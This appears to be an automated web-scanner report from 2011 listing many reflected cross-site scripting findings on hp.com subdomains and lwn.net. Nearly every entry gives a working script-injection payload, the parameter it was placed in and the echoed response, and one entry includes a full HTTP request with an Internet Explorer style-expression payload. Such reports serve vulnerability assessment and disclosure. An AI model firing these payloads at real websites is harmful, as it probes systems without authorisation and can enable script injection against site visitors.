<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics47497"><script>alert(1)</script>2129490ee66/v40/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce4fd"><script>alert(1)</script>a8ac50bab5b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics/v40ce4fd"><script>alert(1)</script>a8ac50bab5b/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35bd7"><script>alert(1)</script>6000b59c9da was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js35bd7"><script>alert(1)</script>6000b59c9da?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bd8"><script>alert(1)</script>7215cf1e60b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resourcese3bd8"><script>alert(1)</script>7215cf1e60b/scripts/dragdrop.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ab1"><script>alert(1)</script>1956d4d9dbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts20ab1"><script>alert(1)</script>1956d4d9dbf/dragdrop.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd15a"><script>alert(1)</script>a3a4eb3735f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/dragdrop.jsbd15a"><script>alert(1)</script>a3a4eb3735f?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e9cc"><script>alert(1)</script>64d1b4e31c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources6e9cc"><script>alert(1)</script>64d1b4e31c2/scripts/effects.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31e71"><script>alert(1)</script>a466e2d5896 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts31e71"><script>alert(1)</script>a466e2d5896/effects.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 515ba"><script>alert(1)</script>8c0eede2f57 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/effects.js515ba"><script>alert(1)</script>8c0eede2f57?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c727"><script>alert(1)</script>83474b9d897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources8c727"><script>alert(1)</script>83474b9d897/scripts/powered_utils.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37d5c"><script>alert(1)</script>d1b7c146211 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts37d5c"><script>alert(1)</script>d1b7c146211/powered_utils.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 727af"><script>alert(1)</script>fc4b8abf13a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/powered_utils.js727af"><script>alert(1)</script>fc4b8abf13a?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0614"><script>alert(1)</script>cb5479040c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resourcesa0614"><script>alert(1)</script>cb5479040c2/scripts/prototype.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f724"><script>alert(1)</script>4700926501a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts1f724"><script>alert(1)</script>4700926501a/prototype.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fbb7"><script>alert(1)</script>b36781bc679 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/prototype.js1fbb7"><script>alert(1)</script>b36781bc679?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ef85"><script>alert(1)</script>e6810596064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources2ef85"><script>alert(1)</script>e6810596064/scripts/scriptaculous.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0912"><script>alert(1)</script>9ac4d4ffdf2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsa0912"><script>alert(1)</script>9ac4d4ffdf2/scriptaculous.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fd3e"><script>alert(1)</script>922b4e83789 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/scriptaculous.js8fd3e"><script>alert(1)</script>922b4e83789?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ecd"><script>alert(1)</script>f7e231bf138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources40ecd"><script>alert(1)</script>f7e231bf138/scripts/slider.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f565d"><script>alert(1)</script>1b065f7549d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsf565d"><script>alert(1)</script>1b065f7549d/slider.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24576"><script>alert(1)</script>64b6d3570f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/slider.js24576"><script>alert(1)</script>64b6d3570f3?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d87a9"><script>alert(1)</script>b864179465a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resourcesd87a9"><script>alert(1)</script>b864179465a/scripts/sound.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cebe6"><script>alert(1)</script>cd545bc9316 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptscebe6"><script>alert(1)</script>cd545bc9316/sound.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26bb"><script>alert(1)</script>16e93b14366 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/sound.jsc26bb"><script>alert(1)</script>16e93b14366?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d07e"><script>alert(1)</script>8207582cd96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources6d07e"><script>alert(1)</script>8207582cd96/scripts/swfobject.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3359"><script>alert(1)</script>57b0543e217 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsf3359"><script>alert(1)</script>57b0543e217/swfobject.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2495"><script>alert(1)</script>35a8d132f3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/swfobject.jsa2495"><script>alert(1)</script>35a8d132f3c?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cf1a"><script>alert(1)</script>3392b3ceb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources4cf1a"><script>alert(1)</script>3392b3ceb5/scripts/widget/loader.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8e0"><script>alert(1)</script>3f3ede39727 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsfe8e0"><script>alert(1)</script>3f3ede39727/widget/loader.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e19f"><script>alert(1)</script>526b6f59145 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widget9e19f"><script>alert(1)</script>526b6f59145/loader.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b7e7"><script>alert(1)</script>29741d37646 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widget/loader.js1b7e7"><script>alert(1)</script>29741d37646?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b659"><script>alert(1)</script>a61331b47f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources8b659"><script>alert(1)</script>a61331b47f9/scripts/widget/util.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05c4"><script>alert(1)</script>cb74612d597 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsf05c4"><script>alert(1)</script>cb74612d597/widget/util.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbf2f"><script>alert(1)</script>11b0cdd28a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widgetbbf2f"><script>alert(1)</script>11b0cdd28a4/util.js?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a40"><script>alert(1)</script>35a035cec2e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widget/util.jsb6a40"><script>alert(1)</script>35a035cec2e?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a135e"><script>alert(1)</script>2f39e748c96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resourcesa135e"><script>alert(1)</script>2f39e748c96/stylesheets/site.jsp?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc38"><script>alert(1)</script>22bac2c020c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/stylesheetsdbc38"><script>alert(1)</script>22bac2c020c/site.jsp?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5152e"><script>alert(1)</script>7a5ede59c82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us">
<head> <title> HP System Err ...[SNIP]... <a class="udrline" href="http://h30187.www3.hp.com/resources/stylesheets/site.jsp5152e"><script>alert(1)</script>7a5ede59c82?printable=true&version=qbert-develop-201108301623-ff5f845"> ...[SNIP]...
The value of the jumpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313d2"%20style%3dx%3aexpression(alert(1))%20bdc6c99b05a was submitted in the jumpid parameter. This input was echoed as 313d2\" style=x:expression(alert(1)) bdc6c99b05a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion313d2"%20style%3dx%3aexpression(alert(1))%20bdc6c99b05a&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564 HTTP/1.1 Host: h41183.www4.hp.com Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 8bc34<script>alert(1)</script>efd39a0477d was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cf79"><script>alert(1)</script>dd792ac85a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:55:09 GMT Server: Apache Expires: -1 Content-Length: 4300 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/Articles2cf79"><script>alert(1)</script>dd792ac85a2/456878/?format=printable" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload badde"><script>alert(1)</script>19cf5213da2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Mon, 05 Sep 2011 01:55:12 GMT Server: Apache Expires: -1 Content-Length: 4300 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>404 - Not Found [LWN.net]</title> <meta HTTP- ...[SNIP]... <a href="/Articles/456878badde"><script>alert(1)</script>19cf5213da2/?format=printable" rel="nofollow"> ...[SNIP]...
3.99. http://lwn.net/Articles/456878/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://lwn.net
Path:
/Articles/456878/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f55"><script>alert(1)</script>2fc14d4e749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title>Red Hat alert RHSA-2011:1220-01 (samba3x) [LWN.net]</ ...[SNIP]... <a href="/Articles/456878/?11f55"><script>alert(1)</script>2fc14d4e749=1?format=printable" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb31"><script>alert(1)</script>b977975e439 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
